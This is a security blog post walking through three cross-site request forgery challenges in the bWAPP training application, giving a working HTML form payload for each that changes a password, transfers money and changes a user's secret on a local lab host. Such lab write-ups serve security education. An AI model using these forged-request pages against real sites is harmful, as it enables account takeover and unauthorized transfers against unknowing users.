Thursday, February 13, 2020

bWAPP CSRF

CSRF (Change Password)

The first challenge is the change password CSRF. Our goal is to successfully change the users password with out logging on the system.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_1.php">
<input type="hidden" name="password_new" value="abc" />
<input type="hidden" name="password_conf" value="abc" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

First we need to create a special page with all the variables needed filled in and a submit button to submit the request. All thats left to do is click the submit button and check the page status.

As you can see we successfully changed our password with the page we created and the CSRF vulnerability.

CSRF (Transfer Amount)

Next up is the transfer amount csrf. This page sends money to an account number with a total value to send. If we alter the variables in the request and push our own request to the server we should get the results we are looking for.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_2.php" method="GET">
<input type="hidden" name="account" value="123-45678-90" />
<input type="hidden" name="amount" value="100" />
<input type="hidden" name="action" value="transfer" />
<input type="submit" name="submit" value="Submit Request" />
</form>
</body>
</html>

We got the page all set up. Now all thats left to do is submit the request and hope for the best.

As you can see we submitted the request and there is now 800 euros left in the account instead of 900 like before the CSRF vulnerability.

CSRF (Change Secret)

This one is a change secret CSRF. Like before we construct a page with all our variables and a submit button

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_3.php" method="POST">
<input type="hidden" name="secret" value="1234" />
<input type="hidden" name="login" value="xyz" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

We have got our page set up. Lets submit the request and see what we get on the other end

As you can see we successfully changed the secret of the user.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...
  • Exploiting Weak WEBDAV Configurations
    The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...